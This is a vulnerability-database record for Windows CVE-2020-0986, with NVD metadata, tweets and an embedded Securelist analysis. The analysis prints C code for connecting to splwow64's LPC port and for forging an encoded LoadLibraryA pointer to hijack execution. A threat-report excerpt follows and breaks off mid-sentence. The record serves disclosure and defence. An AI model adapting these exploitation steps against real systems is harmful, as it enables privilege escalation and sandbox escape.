ID CVE-2020-0986 Type cve Reporter cve@mitre.org Modified 2020-12-23T20:15:00
Description
An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka 'Windows Kernel Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1237, CVE-2020-1246, CVE-2020-1262, CVE-2020-1264, CVE-2020-1266, CVE-2020-1269, CVE-2020-1273, CVE-2020-1274, CVE-2020-1275, CVE-2020-1276, CVE-2020-1307, CVE-2020-1316.
{"id": "CVE-2020-0986", "bulletinFamily": "NVD", "title": "CVE-2020-0986", "description": "An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka 'Windows Kernel Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1237, CVE-2020-1246, CVE-2020-1262, CVE-2020-1264, CVE-2020-1266, CVE-2020-1269, CVE-2020-1273, CVE-2020-1274, CVE-2020-1275, CVE-2020-1276, CVE-2020-1307, CVE-2020-1316.", "published": "2020-06-09T20:15:00", "modified": "2020-12-23T20:15:00", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-0986", "reporter": "cve@mitre.org", "references": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0986", "http://packetstormsecurity.com/files/160698/Microsoft-Windows-splWOW64-Privilege-Escalation.html"], "cvelist": ["CVE-2020-0986"], "type": "cve", "lastseen": "2020-12-24T13:57:46", "edition": 5, "viewCount": 52, "enchantments": {"dependencies": {"references": [{"type": "securelist", "idList": ["SECURELIST:C65BBC029B301149C73E48F99596B4A0", "SECURELIST:03ACF8FB3AEA9D33D265642AD60AF9E9", "SECURELIST:6E5BCE8A736D28A7E168E1CD5131CE3D", "SECURELIST:E2805DD2729049C4BBE6F641B5ADA21C"]}, {"type": "attackerkb", "idList": ["AKB:0E829C08-804A-436D-A730-1B474A82E4A7"]}, {"type": "zdi", "idList": ["ZDI-20-663"]}, {"type": "mscve", "idList": ["MS:CVE-2020-0986"]}, {"type": "thn", "idList": ["THN:279CDD851D8F33C8B07217F8D20F6AAA"]}, {"type": "threatpost", "idList": ["THREATPOST:52B00377F0B400F0EFF0B3C4FF948F6F"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310817140", "OPENVAS:1361412562310817145", "OPENVAS:1361412562310817157", "OPENVAS:1361412562310817143", "OPENVAS:1361412562310817146", "OPENVAS:1361412562310817142", "OPENVAS:1361412562310817144", "OPENVAS:1361412562310817141", "OPENVAS:1361412562310817063"]}, {"type": "nessus", "idList": ["SMB_NT_MS20_JUN_4561649.NASL", "SMB_NT_MS20_JUN_4561616.NASL", "SMB_NT_MS20_JUN_4561608.NASL", "SMB_NT_MS20_JUN_4557957.NASL", "SMB_NT_MS20_JUN_4561621.NASL", "SMB_NT_MS20_JUN_4561612.NASL", "SMB_NT_MS20_JUN_4561602.NASL", "SMB_NT_MS20_JUN_4560960.NASL", "SMB_NT_MS20_JUN_4561666.NASL"]}, {"type": "kaspersky", "idList": ["KLA11807"]}, {"type": "avleonov", "idList": ["AVLEONOV:24538B1ED96269982136AA43998E5780"]}], "modified": "2020-12-24T13:57:46", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:0E829C08-804A-436D-A730-1B474A82E4A7"]}], "modified": "2020-12-24T13:57:46"}, "score": {"value": 5.5, "vector": "NONE", "modified": "2020-12-24T13:57:46", "rev": 2}, "twitter": {"counter": 38, "tweets": [{"link": "https://twitter.com/hackerfantastic/status/1342218312340676609", "text": "Looked into CVE-2020-0986 as unpatched privilege escalations in Windows are hot right now. Articles are a bit misleading, this only allows privilege escalation from low-integrity to medium integrity - useful for exploit chains but it's not SYSTEM privileges. Interesting bug tho."}, {"link": "https://twitter.com/DCWebGuy/status/1342283220151369728", "text": "The CVE-2020-0986 flaw concerns an elevation of privilege exploit in the GDI Print /\u00a0Print Spooler\u00a0API (\"splwow64.exe\") that was reported to Microsoft by an anonymous user working with Trend Micro's Zero Day Initiative (ZDI) back in late December 2019."}, {"link": "https://twitter.com/ROlejnikov/status/1342428136844230663", "text": "The local privilege-escalation bug in Windows 8.1 and Windows 10 (CVE-2020-0986) exists in the Print Spooler API. It could allow a local attacker to elevate privileges and execute code in the context of the current user."}, {"link": "https://twitter.com/TowardsCybersec/status/1342452133413617666", "text": "Originally tracked as CVE-2020-0986, the flaw concerns an elevation of privilege exploit in the GDI Print / Print Spooler API (\"splwow64.exe\") that was reported to Microsoft by an anonymous user back in late December 2019.\n\n/hashtag/cybersecurity?src=hashtag_click /hashtag/security?src=hashtag_click /hashtag/privacy?src=hashtag_click /hashtag/infosec?src=hashtag_click /hashtag/Windows?src=hashtag_click"}, {"link": "https://twitter.com/misaelban/status/1342579858472374275", "text": "/hashtag/Google?src=hashtag_click hackers disclose /hashtag/exploit?src=hashtag_click for an UNPATCHED /hashtag/Windows?src=hashtag_click /hashtag/vulnerability?src=hashtag_click /hashtag/CVE?src=hashtag_click-2020-0986 that was exploited as 0-day in the wild, for which /hashtag/Microsoft?src=hashtag_click issued an incomplete patch and then failed to patch it again under the 90-day deadline. https://t.co/VNaH1X9yuN?amp=1 /hashtag/CyberSecurity?src=hashtag_click"}, {"link": "https://twitter.com/f1tym1/status/1343584016742703106", "text": "Google: Microsoft Improperly Patched Exploited Windows Vulnerability\n\nGoogle Project Zero has disclosed a Windows zero-day vulnerability caused by the improper fix for CVE-2020-0986, a security flaw abused in a campaign dubbed Operation PowerFall.\n\nread \u2026 https://t.co/sfpq8wC9hf?amp=1"}, {"link": "https://twitter.com/IonutArghire/status/1343605796811264000", "text": "Google discloses Windows vulnerability caused by improper fix for CVE-2020-0986, a privilege escalation bug exploited in attacks https://t.co/cugDcwgd7c?amp=1"}, {"link": "https://twitter.com/WiFi_SEC_acc/status/1343959184686125062", "text": "Google Project Zero researcher Maddie Stone explains, in May, Kaspersky (/oct0xor) discovered CVE-2020-0986 in Windows splwow64 was exploited itw as a 0day. \nMS released a patch in June, but that patch didnt fix the vuln. After rep\u2026https://t.co/YGOu1YdJKe?amp=1 https://t.co/h94nflryDB?amp=1"}, {"link": "https://twitter.com/petermorin123/status/1343966191786844173", "text": "Google Project Zero has disclosed a Windows zero-day vulnerability caused by the improper fix for CVE-2020-0986, a security flaw abused in a campaign dubbed Operation PowerFall.\n\nhttps://t.co/JPRkNJDH1U?amp=1"}, {"link": "https://twitter.com/HermCardona/status/1346187152724471813", "text": "/hashtag/CVE?src=hashtag_click-2020-0986 concerns an elevation of privilege exploit in the GDI Print / Print Spooler API (\"splwow64.exe\") that was reported to Microsoft. /hashtag/cybersecurity?src=hashtag_click /hashtag/pentesting?src=hashtag_click /hashtag/redteam?src=hashtag_click"}], "modified": "2020-12-24T13:57:46"}, "vulnersScore": 5.5}, "cpe": ["cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_server_2016:1803", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_10:1709", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2016:1903"], "affectedSoftware": [{"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1809"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1607"}, {"cpeName": "microsoft:windows_rt_8.1", "name": "microsoft windows rt 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "1903"}, {"cpeName": "microsoft:windows_server_2019", "name": "microsoft windows server 2019", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "1909"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "2004"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1709"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "2004"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_8.1", "name": "microsoft windows 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1903"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "1803"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1909"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1803"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "-"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.2, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"], "cwe": ["CWE-269"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:1803:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}}
{"securelist": [{"lastseen": "2020-09-02T16:17:54", "bulletinFamily": "blog", "cvelist": ["CVE-2019-0880", "CVE-2020-0986"], "description": "\n\nIn August 2020, we published a blog post about [Operation PowerFall](<https://securelist.com/ie-and-windows-zero-day-operation-powerfall/97976/>). This targeted attack consisted of two zero-day exploits: a remote code execution exploit for Internet Explorer 11 and an elevation of privilege exploit targeting the latest builds of Windows 10. While we already described the exploit for Internet Explorer in the original blog post, we also promised to share more details about the elevation of privilege exploit in a follow-up post. Let's take a look at vulnerability CVE-2020-0986, how it was exploited by attackers, how it was fixed and what additional mitigations were implemented to complicate exploitation of many other similar vulnerabilities.\n\n## CVE-2020-0986\n\nCVE-2020-0986 is an arbitrary pointer dereference vulnerability in [GDI Print](<https://docs.microsoft.com/en-us/windows/win32/printdocs/about-the-gdi-print-api>)/[Print Spooler](<https://docs.microsoft.com/en-us/windows/win32/printdocs/print-spooler-api>) API. By using this vulnerability it is possible to manipulate the memory of the splwow64.exe process to achieve execution of arbitrary code in the process and escape the Internet Explorer 11 sandbox because splwow64.exe is running with medium integrity level. "Print driver host for applications," as Microsoft describes splwow64.exe, is a relatively small binary that hosts 64-bit user-mode printer drivers and implements the Local Procedure Call (LPC) server that can be used by other processes to access printing functions. This allows the use of 64-bit printer drivers from 32-bit processes. Below I provide the code that can be used to spawn splwow64.exe and connect to splwow64.exe's LPC server.\n \n \n typedef struct _PORT_VIEW\n {\n \tUINT64 Length;\n \tHANDLE SectionHandle;\n \tUINT64 SectionOffset;\n \tUINT64 ViewSize;\n \tUCHAR* ViewBase;\n \tUCHAR* ViewRemoteBase;\n } PORT_VIEW, *PPORT_VIEW;\n \n PORT_VIEW ClientView;\n \n typedef struct _PORT_MESSAGE_HEADER {\n \tUSHORT DataSize;\n \tUSHORT MessageSize;\n \tUSHORT MessageType;\n \tUSHORT VirtualRangesOffset;\n \tCLIENT_ID ClientId;\n \tUINT64 MessageId;\n \tUINT64 SectionSize;\n } PORT_MESSAGE_HEADER, *PPORT_MESSAGE_HEADER;\n \n typedef struct _PROXY_MSG {\n \tPORT_MESSAGE_HEADER MessageHeader;\n \tUINT64 InputBufSize;\n \tUINT64 InputBuf;\n \tUINT64 OutputBufSize;\n \tUINT64 OutputBuf;\n \tUCHAR Padding[0x1F8];\n } PROXY_MSG, *PPORT_MESSAGE;\n \n PROXY_MSG LpcReply;\n PROXY_MSG LpcRequest;\n \n int GetPortName(PUNICODE_STRING DestinationString)\n {\n \tvoid *tokenHandle;\n \tDWORD sessionId;\n \tULONG length;\n \n \tint tokenInformation[16];\n \tWCHAR dst[256];\n \n \tmemset(tokenInformation, 0, sizeof(tokenInformation));\n \tProcessIdToSessionId(GetCurrentProcessId(), &sessionId);\n \n \tmemset(dst, 0, sizeof(dst));\n \n \tif (NtOpenProcessToken(GetCurrentProcess(), READ_CONTROL | TOKEN_QUERY, &tokenHandle)\n \t\t|| ZwQueryInformationToken(tokenHandle, TokenStatistics, tokenInformation, sizeof(tokenInformation), &length))\n \t{\n \t\treturn 0;\n \t}\n \n \twsprintfW(\n \t\tdst,\n \t\tL\"\\\\RPC Control\\\\UmpdProxy_%x_%x_%x_%x\",\n \t\tsessionId,\n \t\ttokenInformation[2],\n \t\ttokenInformation[3],\n \t\t0x2000);\n \tRtlInitUnicodeString(DestinationString, dst);\n \n \treturn 1;\n }\n \n HANDLE CreatePortSharedBuffer(PUNICODE_STRING PortName)\n {\n \tHANDLE sectionHandle = 0;\n \tHANDLE portHandle = 0;\n \tunion _LARGE_INTEGER maximumSize;\n \tmaximumSize.QuadPart = 0x20000;\n \n \tNtCreateSection(§ionHandle, SECTION_MAP_WRITE | SECTION_MAP_READ, 0, &maximumSize, PAGE_READWRITE, SEC_COMMIT, NULL);\n \tif (sectionHandle)\n \t{\n \t\tClientView.SectionHandle = sectionHandle;\n \t\tClientView.Length = 0x30;\n \t\tClientView.ViewSize = 0x9000;\n \t\tZwSecureConnectPort(&portHandle, PortName, NULL, &ClientView, NULL, NULL, NULL, NULL, NULL);\n \t}\n \n \treturn portHandle;\n }\n \n int main()\n {\n \tprintf(\"Spawn splwow64.exe\\n\");\n \tCHAR Path[0x100];\n \tGetCurrentDirectoryA(sizeof(Path), Path);\n \tPathAppendA(Path, \"CreateDC.exe\"); // x86 application with call to CreateDC\n \tWinExec(Path, 0);\n \tSleep(1000);\n \n \tCreateDCW(L\"Microsoft XPS Document Writer\", L\"Microsoft XPS Document Writer\", NULL, NULL);\n \n \tprintf(\"Get port name\\n\");\n \tUNICODE_STRING portName;\n \tif (!GetPortName(&portName))\n \t{\n \t\tprintf(\"Failed to get port name\\n\");\n \t\treturn 0;\n \t}\n \n \tprintf(\"Create port\\n\");\n \tHANDLE portHandle = CreatePortSharedBuffer(&portName);\n \tif (!(portHandle && ClientView.ViewBase && ClientView.ViewRemoteBase))\n \t{\n \t\tprintf(\"Failed to create port\\n\");\n \t\treturn 0;\n \t}\n }\n\nTo send data to the LPC server it's enough to prepare the printer command in the shared memory region and send an LPC message with NtRequestWaitReplyPort().\n \n \n memset(&LpcRequest, 0, sizeof(LpcRequest));\n LpcRequest.MessageHeader.DataSize = 0x20;\n LpcRequest.MessageHeader.MessageSize = 0x48;\n \n LpcRequest.InputBufSize = 0x88;\n LpcRequest.InputBuf = (UINT64)ClientView.ViewRemoteBase; // Points to printer command\n LpcRequest.OutputBufSize = 0x10;\n LpcRequest.OutputBuf = (UINT64)ClientView.ViewRemoteBase + LpcRequest.InputBufSize;\n \n // TODO: Prepare printer command\n \n NtRequestWaitReplyPort(portHandle, &LpcRequest, &LpcReply);\n\nWhen the LPC message is received, it is processed by the function TLPCMgr::ProcessRequest(PROXY_MSG *). This function takes _LpcRequest_ as a parameter and verifies it. After that it allocates a buffer for the printer command and copies it there from shared memory. The printer command function INDEX, which is used to identify different driver functions, is stored as a double word at offset 4 in the printer command structure. Almost a complete list of different function INDEX values can be found in the header file _winddi.h_. This header file includes different INDEX values from INDEX_DrvEnablePDEV (0) up to INDEX_LAST (103), but the full list of INDEX values does not end there. Analysis of gdi32full.dll reveals that that are a number of special INDEX values and some of them are provided in the table below (to find them in binary, look for calls to PROXYPORT::SendRequest).\n \n \n 106 \u2013 INDEX_LoadDriver\n 107 - INDEX_UnloadDriver\n 109 \u2013 INDEX_DocumentEvent\n 110 \u2013 INDEX_StartDocPrinterW\n 111 \u2013 INDEX_StartPagePrinter\n 112 \u2013 INDEX_EndPagePrinter\n 113 \u2013 INDEX_EndDocPrinter\n 114 \u2013 INDEX_AbortPrinter\n 115 \u2013 INDEX_ResetPrinterW\n 116 \u2013 INDEX_QueryColorProfile\n\nFunction TLPCMgr::ProcessRequest(PROXY_MSG *) checks the function INDEX value and if it passes the checks, the printer command will be processed by function GdiPrinterThunk in gdi32full.dll.\n \n \n if ( IsKernelMsg || INDEX >= 106 && (INDEX <= 107 || INDEX - 109 <= 7))\n {\n // \u2026\n GdiPrinterThunk(LpcRequestInputBuf, LpcRequestOutputBuf, LpcRequestOutputBufSize);\n }\n\nGdiPrinterThunk itself is a very large function that processes more than 60 different function INDEX values, and the handler for one of them \u2013 namely INDEX_DocumentEvent \u2013 contains vulnerability CVE-2020-0986. The handler for INDEX_DocumentEvent will use information provided in the printer command (fully controllable from the LPC client) to check that the command is intended for a printer with a valid handle. After the check it will use the function DecodePointer to decode the pointer of the function stored at the _fpDocumentEvent_ global variable (located in .data segment), then use the decoded pointer to execute the function, and finally perform a call to memcpy() where source, destination and size arguments are obtained from the printer command and are fully controllable by the attacker.\n\n## Exploitation\n\nIn Windows OS the base addresses of system DLL libraries are randomized with each boot, aiding exploitation of this vulnerability. The exploit loads the libraries gdi32full.dll and winspool.drv, and then obtains the offset of the _fpDocumentEvent_ pointer from gdi32full.dll and the address of the DocumentEvent function from winspool.drv. After that the exploit performs a number of LPC requests with specially crafted INDEX_DocumentEvent commands to leak the value of the _fpDocumentEvent_ pointer. The value of the raw pointer is protected using [EncodePointer](<https://docs.microsoft.com/en-us/previous-versions/bb432254\\(v=vs.85\\)>) protection, but the function pointed to by this raw pointer is executed each time the INDEX_DocumentEvent command is sent and the arguments of this function are fully controllable. All this makes the _fpDocumentEvent_ pointer the best candidate for an overwrite. A necessary step for exploitation is to encode our own pointer in such a manner that it will be properly decoded by the function DecodePointer. Since we have the value of the encoded pointer and the value of the decoded pointer (address of the DocumentEvent function from winspool.drv), we are able to calculate the secret constant used for pointer encoding and then use it to encode our own pointer. The necessary calculations are provided below.\n \n \n // Calculate secret for pointer encoding\n while (1)\n {\n \tsecret = (unsigned int)DocumentEvent ^ __ROL8__(*(UINT64*)leaked_fpDocumentEvent, i & 0x3F);\n \tif ((secret & 0x3F) == i && __ROR8__((UINT64)DocumentEvent ^ secret, secret & 0x3F) == *(UINT64*)leaked_fpDocumentEvent)\n \t\tbreak;\n \tif (++i > 0x3F)\n \t{\n \t\tsecret = 0;\n \t\tbreak;\n \t}\n }\n \n // Encode LoadLibraryA pointer with calculated secret\n UINT64 encodedPtr = __ROR8__(secret ^ (UINT64)LoadLibraryA, secret & 0x3F);\n\nAt this stage, in order to achieve code execution from the splwow64.exe process, it's sufficient to overwrite the _fpDocumentEvent_ pointer with the encoded pointer of function LoadLibraryA and provide the name of a library to load in the next LPC request with the INDEX_DocumentEvent command.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31152055/sl_operation_powerfall_01.png>)\n\n**_Overview of attack_**\n\n## CVE-2019-0880\n\nAnalysis of CVE-2020-0986 reveals that this vulnerability is the twin brother of the previously discovered CVE-2019-0880. The write-up for CVE-2019-0880 is available [here](<https://byteraptors.github.io/windows/exploitation/2020/05/24/sandboxescape.html>). It's another vulnerability that was exploited as an in-the-wild zero-day. CVE-2019-0880 is just another fully controllable call to memcpy() in the same GdiPrinterThunk function, just a few lines of code away in a handler of function INDEX 118. It seems hard to believe that the developers didn't notice the existence of a variant for this vulnerability, so why was CVE-2020-0986 not patched back then and why did it take so long to fix it? It may not be obvious on first glance, but GdiPrinterThunk is totally broken. Even fixing a couple of calls to memcpy doesn't really help.\n\n## Arbitrary pointer dereference host for applications\n\nThe problem lies in the fact that almost every function INDEX in GdiPrinterThunk is susceptible to a potential arbitrary pointer dereference vulnerability. Let's take a look again at the format of the LPC request message.\n \n \n typedef struct _PROXY_MSG {\n \tPORT_MESSAGE_HEADER MessageHeader;\n \tUINT64 InputBufSize;\n \tUINT64 InputBuf;\n \tUINT64 OutputBufSize;\n \tUINT64 OutputBuf;\n \tUCHAR Padding[0x1F8];\n } PROXY_MSG, *PPORT_MESSAGE;\n\n_InputBuf_ and _OutputBuf_ are both pointers that should point to a shared memory region. _InputBuf_ points to a location where the printer command is prepared, and when this command is processed by GdiPrinterThunk the result might be written back to the LPC client using the pointer that was provided as _OutputBuf_. Many handlers for different INDEX values provide data to the LPC client, but the problem is that the pointers _InputBuf_ and _OutputBuf_ are fully controllable from the LPC client and manipulation of the _OutputBuf_ pointer can lead to an overwrite of splwow64.exe's process memory.\n\n## How it was mitigated\n\nMicrosoft fixed CVE-2020-0986, but also implemented a mitigation aimed to make exploitation of _OutputBuf_ vulnerabilities as hard as possible. Before the patch the function FindPrinterHandle() blindly trusted the data provided through the printer command in an LPC request and it was easy to bypass a valid handle check. After the patch the format of the printer command was changed so it no longer contains the address of the handle table, but instead contains a valid driver ID (quad word at offset 0x18). Now the linked list of handle tables is stored inside the splwow64.exe process and the new function FindDriverForCookie() uses the provided driver ID to get a handle table securely. For a printer command to be processed it should contain a valid printer handle (quad word at offset 0x20). The printer handle consists of process ID and the address of the buffer allocated for the printer driver. It is possible to guess some bytes of the printer handle, but a successful real-world brute-force attack on this implementation seems to be unlikely. So, it's safe to assume that this bug class was properly mitigated. However, there are still a couple of places in the code where it is possible to write a 0 for the address provided as _OutputBuf_ without a handle check, but exploitation in such a scenario doesn't appear to be feasible.", "modified": "2020-09-02T10:00:56", "published": "2020-09-02T10:00:56", "id": "SECURELIST:C65BBC029B301149C73E48F99596B4A0", "href": "https://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/", "type": "securelist", "title": "Operation PowerFall: CVE-2020-0986 and variants", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-24T16:20:40", "bulletinFamily": "blog", "cvelist": ["CVE-2020-0986", "CVE-2020-1380"], "description": "\n\n## Targeted attacks\n\n### MATA: Lazarus's multi-platform targeted malware framework\n\nThe more sophisticated threat actors are continually developing their TTPs (Tactics, Techniques and Procedures) and the toolsets they use to compromise the systems of their targets. However, malicious toolsets used to target multiple platforms are rare, because they required significant investment to develop and maintain them. In July, we reported the use of an advanced, multi-purpose malware framework developed by the Lazarus group.\n\nWe discovered the first artefacts relating to this framework, dubbed 'MATA' (the authors named their infrastructure 'MataNet') in April 2018. Since then, Lazarus has further developed MATA; and there are now versions for Windows, Linux and macOS operating systems.\n\nThe MATA framework consists of several components, including a loader, an orchestrator (which manages and coordinates the processes once a device is infected) a C&C server and various plugins.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/07/08145951/sl_mata_01.png>)\n\nLazarus has used MATA to infiltrate the networks of organizations around the world and steal data from customer databases; and, in at least one case, the group has used it to spread ransomware \u2013 you can read more about this in the next section. The victims have included software developers, Internet providers and e-commerce sites; and we detected traces of the group's activities in Poland, Germany, Turkey, Korea, Japan, and India.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/07/08150538/sl_mata_04.png>)\n\nYou can read more about MATA [here](<https://securelist.com/mata-multi-platform-targeted-malware-framework/97746/>).\n\n### Lazarus on the hunt for big game\n\nTargeted ransomware has been on the increase in recent years. Typically, such attacks are carried out by criminal groups, who license 'as-a-service' ransomware from third-party malware developers and then distribute it by piggy-backing established botnets.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/07/08160419/sl_lazarus_01.png>)\n\nHowever, earlier this year we discovered a new ransomware family linked to the Lazarus APT group. The [VHD ransomware](<https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/>) operates much like other ransomware \u2013 it encrypts files on drives connected to the victim's computer and deletes System Volume Information (used as part of the Windows restore point feature) to prevent recovery of data. The malware also suspends processes that could potentially lock important files, such as Microsoft Exchange or SQL Server. However, the delivery mechanism is more reminiscent of APT campaigns. The spreading utility contains a list of administrative credentials and IP addresses specific to the victim, which is uses to brute-force the SMB service on every discovered computer. Whenever it makes a successful connection, a network share is mounted and the VHD ransomware is copied and executed through WMI calls.\n\nWhile investigating a second incident, we were able to uncover the full infection chain. The malware gained access to a victim's system by exploiting a vulnerable VPN gateway and then obtained administrative rights on the compromised machines. It used these to install a backdoor and take control of the Active Directory server. Then all computers were infected with the VHD ransomware using a loader created specifically for this task.\n\nFurther analysis revealed the backdoor to be part of the MATA framework described above.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/07/08160730/sl_lazarus_03.png>)\n\n### WastedLocker\n\n[Garmin, the GPS and aviation specialist, was the victim of a cyber-attack](<https://www.garmin.com/en-US/outage/>) in July that resulted in the encryption of some of its systems. The malware used in the attack was the WastedLocker and you can read our technical analysis of this ransomware [here](<https://securelist.com/wastedlocker-technical-analysis/97944/>).\n\nThis ransomware, the use of which has increased this year, has several noteworthy features. It includes a command line interface that attackers can use to control the way it operates \u2013 specifying directories to target and setting a priority of which files to encrypt first; and controlling the encryption of files on specified network resources. WastedLocker also features a bypass for UAC (User Account Control) on Windows 